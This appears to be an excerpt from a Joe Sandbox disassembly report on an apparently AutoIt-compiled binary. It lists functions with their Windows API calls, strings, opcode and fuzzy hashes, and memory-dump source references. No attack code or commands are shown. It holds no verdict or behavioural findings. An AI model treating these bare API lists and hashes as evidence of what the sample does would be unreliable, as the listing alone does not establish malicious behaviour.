                            • API String ID: 4278518827-0
                            • Opcode ID: 11a7b9edc2286c3176ce0874aa18ae8c408b69dc811019d98c41835b0f31ed36
                            • Instruction ID: 7fc98adf32ff996969bae5c6e6955c88ca18fb9d7a3822e3ab7d98d67fea44c7
                            • Opcode Fuzzy Hash: 11a7b9edc2286c3176ce0874aa18ae8c408b69dc811019d98c41835b0f31ed36
                            • Instruction Fuzzy Hash: E0016CB0902B597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                            Function 004253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32 ref: 004253F9
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0042540F
                            • GetWindowThreadProcessId.USER32(?,?), ref: 0042541E
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0042542D
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00425437
                            • CloseHandle.KERNEL32(00000000), ref: 0042543E
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: 7e72ac6b5ccc5d539465b65731c6b841ab704a431033a77a072eaa9fe2f3085d
                            • Instruction ID: 72bb998f4072339852691b44f3710cc14a7b99b8ab269b6d008202eca0078363
                            • Opcode Fuzzy Hash: 7e72ac6b5ccc5d539465b65731c6b841ab704a431033a77a072eaa9fe2f3085d
                            • Instruction Fuzzy Hash: A9F01D36241558BBE7215BA29C0DEAB7A7CEBC7B11F000179FA04D10519AA51A0686B9
                            Function 00427230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?,?,?,?,00405D3D,?,?,?,?,003D0EE4,?,?), ref: 00427243
                            • EnterCriticalSection.KERNEL32(?,?,003D0EE4,?,?), ref: 00427254
                            • TerminateThread.KERNEL32(00000000,000001F6,?,003D0EE4,?,?), ref: 00427261
                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,003D0EE4,?,?), ref: 0042726E
                              • Part of subcall function 00426C35: CloseHandle.KERNEL32(00000000), ref: 00426C3F
                            • InterlockedExchange.KERNEL32(?,000001F6,?,003D0EE4,?,?), ref: 00427281
                            • LeaveCriticalSection.KERNEL32(?,?,003D0EE4,?,?), ref: 00427288
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 48aea202f510485a212cdc381f60b24cbdfb1085528b47b08c8bc5e4d92dcab1
                            • Instruction ID: b876d6822db8bd400bb4fdbc482ca884049e237ed8ac971e6d0225db2710bc17
                            • Opcode Fuzzy Hash: 48aea202f510485a212cdc381f60b24cbdfb1085528b47b08c8bc5e4d92dcab1
                            • Instruction Fuzzy Hash: 03F0823E540A12EBE7112B64FD4C9DB7779FF46702B5005B2F503910A0CBBB5815CB68
                            Function 00418992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041899D
                            • UnloadUserProfile.USERENV(?,?), ref: 004189A9
                            • CloseHandle.KERNEL32(?), ref: 004189B2
                            • CloseHandle.KERNEL32(?), ref: 004189BA
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004189C3
                            • HeapFree.KERNEL32(00000000), ref: 004189CA
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                            • Instruction ID: 31a27faa56cc57cec5e58d63ca4e9026a37862f61046b8bcedf47ae97ad442b4
                            • Opcode Fuzzy Hash: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                            • Instruction Fuzzy Hash: 97E0757A104505FBDB011FE5EC0C95ABFB9FF8A762B508631F619C1470CB32A869DB58
                            Function 00417530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                            Download Yara Rule
                            APIs
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 004176EA
                            • CoTaskMemFree.OLE32(00000000), ref: 00417702
                            • CLSIDFromProgID.OLE32(?,?), ref: 00417727
                            • _memcmp.LIBCMT ref: 00417748
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FromProg$FreeTask_memcmp
                            • String ID: ,,E
                            • API String ID: 314563124-4052858919
                            • Opcode ID: 0ca774a4f2715149790df1d5dd988db9b80ded9420fba37d073eda5fb7d18060
                            • Instruction ID: 250ea1d41728423e6fc643b81aa09b75dd42e1e2fbd1101657d620f84de7dcbf
                            • Opcode Fuzzy Hash: 0ca774a4f2715149790df1d5dd988db9b80ded9420fba37d073eda5fb7d18060
                            • Instruction Fuzzy Hash: 33814B75A00109EFCB00DFA4C984EEEB7B9FF89315F204559E506EB250DB75AE46CB60
                            Function 004385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00438613
                            • CharUpperBuffW.USER32(?,?), ref: 00438722
                            • VariantClear.OLEAUT32(?), ref: 0043889A
                              • Part of subcall function 00427562: VariantInit.OLEAUT32(00000000), ref: 004275A2
                              • Part of subcall function 00427562: VariantCopy.OLEAUT32(00000000,?), ref: 004275AB
                              • Part of subcall function 00427562: VariantClear.OLEAUT32(00000000), ref: 004275B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: da1a0c6c21f7dbc764961e0cc68fa5ec6556104a44b75a4759fa2071f798daa4
                            • Instruction ID: 03162252e441908592f6fd50106e23092a5bb417a100f9d9f9f9a55ad730b6bd
                            • Opcode Fuzzy Hash: da1a0c6c21f7dbc764961e0cc68fa5ec6556104a44b75a4759fa2071f798daa4
                            • Instruction Fuzzy Hash: F0917A716043019FCB14EF24C485A5AB7E4EF89714F14896EF88ACB361DB34ED46CB56
                            Function 00422A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • _memset.LIBCMT ref: 00422B87
                            • GetMenuItemInfoW.USER32 ref: 00422BB6
                            • SetMenuItemInfoW.USER32 ref: 00422C69
                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00422C97
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                            • String ID: 0
                            • API String ID: 4152858687-4108050209
                            • Opcode ID: 3d65054dca5bce5a48e37c0483028bd3d73bbeea6cfcde4245d703562d749d29
                            • Instruction ID: b645ef0370d80956eee2ad55a0252408de9e1a9d743e4a0ebf4400ae6881629f
                            • Opcode Fuzzy Hash: 3d65054dca5bce5a48e37c0483028bd3d73bbeea6cfcde4245d703562d749d29
                            • Instruction Fuzzy Hash: 3451E471708321AAD725AF25E94566F7BE4AF45310F440A2FF880D72D0DBB8DC44875A
                            Function 003D3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$_free
                            • String ID: 3c=$_=
                            • API String ID: 2620147621-3170935384
                            • Opcode ID: 93e9e6f8e52fa90a42b79b1d268eb00935b3c2ef3896f5b2b9984dd8a42c8d53
                            • Instruction ID: a5e2b38f2f4ac553798301a6371d1939e2fe7d087f8ef7dfef1c580ec172e6dc
                            • Opcode Fuzzy Hash: 93e9e6f8e52fa90a42b79b1d268eb00935b3c2ef3896f5b2b9984dd8a42c8d53
                            • Instruction Fuzzy Hash: 525168766083418FDB26CF29D840A6BBBF5AF85300F45492EE98997390DB35ED01CB83
                            Function 003D6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memset$_memmove
                            • String ID: 3c=$ERCP
                            • API String ID: 2532777613-727080923
                            • Opcode ID: 5904ed1886c22a20645ae354f14d870429805bac6d33499487d7ebc5f260691c
                            • Instruction ID: 1af78157e453fc1ee631844c7826ec1b8ffc7324e2fc602ee5d97cae7e69c453
                            • Opcode Fuzzy Hash: 5904ed1886c22a20645ae354f14d870429805bac6d33499487d7ebc5f260691c
                            • Instruction Fuzzy Hash: 39519E71900705DBDB25CF65D882BABB7F8AF44304F20896FE45ACB290E774AA84CB44
                            Function 004497F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(00E35190,?), ref: 00449863
                            • ScreenToClient.USER32(00000002,00000002), ref: 00449896
                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00449903
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID: `$
                            • API String ID: 3880355969-74666722
                            • Opcode ID: cc84969a38716b56f038dcdc97e4f13feb6299447a3d5c8e4e8cba412b2045b9
                            • Instruction ID: 890d8d8535bb67d41f3ff6eab043cad0a13d526c79c2fd0f4ec88705323fa803
                            • Opcode Fuzzy Hash: cc84969a38716b56f038dcdc97e4f13feb6299447a3d5c8e4e8cba412b2045b9
                            • Instruction Fuzzy Hash: 19514A74A00208EFDB14DF68C880AAF7BB5FB46360F14856EF8559B3A0D734AD51DB94
                            Function 00422753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: 95bc7ea2e80bdbf61615858979bbbef420cddf049205388542e27ee340e14616
                            • Instruction ID: 95f41621cfd8066f9170c3733f3e4d2c8983434d0f5465625ff4a78ea74a7904
                            • Opcode Fuzzy Hash: 95bc7ea2e80bdbf61615858979bbbef420cddf049205388542e27ee340e14616
                            • Instruction Fuzzy Hash: AB41F070204321AFD720EF25E944B6BBBE8EF85314F044A2EF86597391D7B4E904CB5A
                            Function 00448851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004488DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: `$
                            • API String ID: 634782764-74666722
                            • Opcode ID: e804d34591957cea5e9ef7e9a7682457e47981792eee59da04b003d426aba4c0
                            • Instruction ID: c1199b097912527036c3eb59e072fce424b62106a513c74a633dd02f41b01d27
                            • Opcode Fuzzy Hash: e804d34591957cea5e9ef7e9a7682457e47981792eee59da04b003d426aba4c0
                            • Instruction Fuzzy Hash: FE31E374600908BFFB20AB18CC45BBE77A0FB06310F54442BF911E62A1CE38E9409B5F
                            Function 0044AB37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 0044AB60
                            • GetWindowRect.USER32(?,?), ref: 0044ABD6
                            • PtInRect.USER32(?,?,0044C014), ref: 0044ABE6
                            • MessageBeep.USER32(00000000,?,?,?,?,0044C014,?,?,?), ref: 0044AC57
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID: `$
                            • API String ID: 1352109105-74666722
                            • Opcode ID: 4e41e13a2a97ddc0673e15ff4a92c6da8165feb64c993be813158690a5e9ddce
                            • Instruction ID: 1a8a4e7779281933482fafb7f4c37ae71f28b265bc4dd3816f771fc8689bc286
                            • Opcode Fuzzy Hash: 4e41e13a2a97ddc0673e15ff4a92c6da8165feb64c993be813158690a5e9ddce
                            • Instruction Fuzzy Hash: 3B419F35A40118DFEB11DF58D8C4A5ABBF5FB49304F1884BAE9149F360C734E861CB9A
                            Function 0043D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0043D7C5
                              • Part of subcall function 003C784B: _memmove.LIBCMT ref: 003C7899
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharLower_memmove
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 3425801089-567219261
                            • Opcode ID: ae03c6bb1d466feb8260cdf9231a50f3eb61c2aeea25780d2aff2720c48c25cd
                            • Instruction ID: 47e07ef24e363a44a02c6c45e07dfb77271b07a159576e83bcc54a88636bd978
                            • Opcode Fuzzy Hash: ae03c6bb1d466feb8260cdf9231a50f3eb61c2aeea25780d2aff2720c48c25cd
                            • Instruction Fuzzy Hash: 8F31AE71904219ABDF05EF64CC519EEB3B5FF08320F108A6AE8399B2D1DB75AD45CB84
                            Function 00418E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00418F14
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00418F27
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00418F57
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove$ClassName
                            • String ID: ComboBox$ListBox
                            • API String ID: 365058703-1403004172
                            • Opcode ID: 2acdf9237cf7720a0ba9712107f3756cfdf826a1c96dd64fb9e6eeb0a1163206
                            • Instruction ID: 4f7af09475ff8a533f6ee1fe6c2d822563c3a49fb1e685436ef7111c31d3690a
                            • Opcode Fuzzy Hash: 2acdf9237cf7720a0ba9712107f3756cfdf826a1c96dd64fb9e6eeb0a1163206
                            • Instruction Fuzzy Hash: 3A210471A01108BADB15ABB0CC85EFFB769DF46360F14412EF8259B2E0DF391C8A9A14
                            Function 0043182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043184C
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431872
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004318A2
                            • InternetCloseHandle.WININET(00000000), ref: 004318E9
                              • Part of subcall function 00432483: GetLastError.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 00432498
                              • Part of subcall function 00432483: SetEvent.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 004324AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3113390036-3916222277
                            • Opcode ID: 8b72e945935db97206527384d11a8f47e5370c15db3c1674eadfe29d5a92a3b6
                            • Instruction ID: b6a7ab0cde5b6d27f849e4c82c0e6ddf7dc61b2de6a74803b0a8f8026dff0530
                            • Opcode Fuzzy Hash: 8b72e945935db97206527384d11a8f47e5370c15db3c1674eadfe29d5a92a3b6
                            • Instruction Fuzzy Hash: FA21DEB1500208BFEB11AB61CC84EBB77ECEB4D748F10512BF805A2290EA688D0597B9
                            Function 0044C498 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetCursorPos.USER32(?), ref: 0044C4D2
                            • TrackPopupMenuEx.USER32 ref: 0044C4E7
                            • GetCursorPos.USER32(?), ref: 0044C534
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FB9AB,?,?,?), ref: 0044C56E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID: `$
                            • API String ID: 2864067406-74666722
                            • Opcode ID: db4ffb76d74f5d94472d3c4f54ae93e2328679f811188385297583504aad70aa
                            • Instruction ID: 840eb5b31684a0659efb7b98f1caac359bb8da3e8a9a2ff0a551f239d7b6c3df
                            • Opcode Fuzzy Hash: db4ffb76d74f5d94472d3c4f54ae93e2328679f811188385297583504aad70aa
                            • Instruction Fuzzy Hash: F2319135601028FFDB559F58C898EAF7BB5EB09350F48406AF9058B361C735AD60DBA8
                            Function 004463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
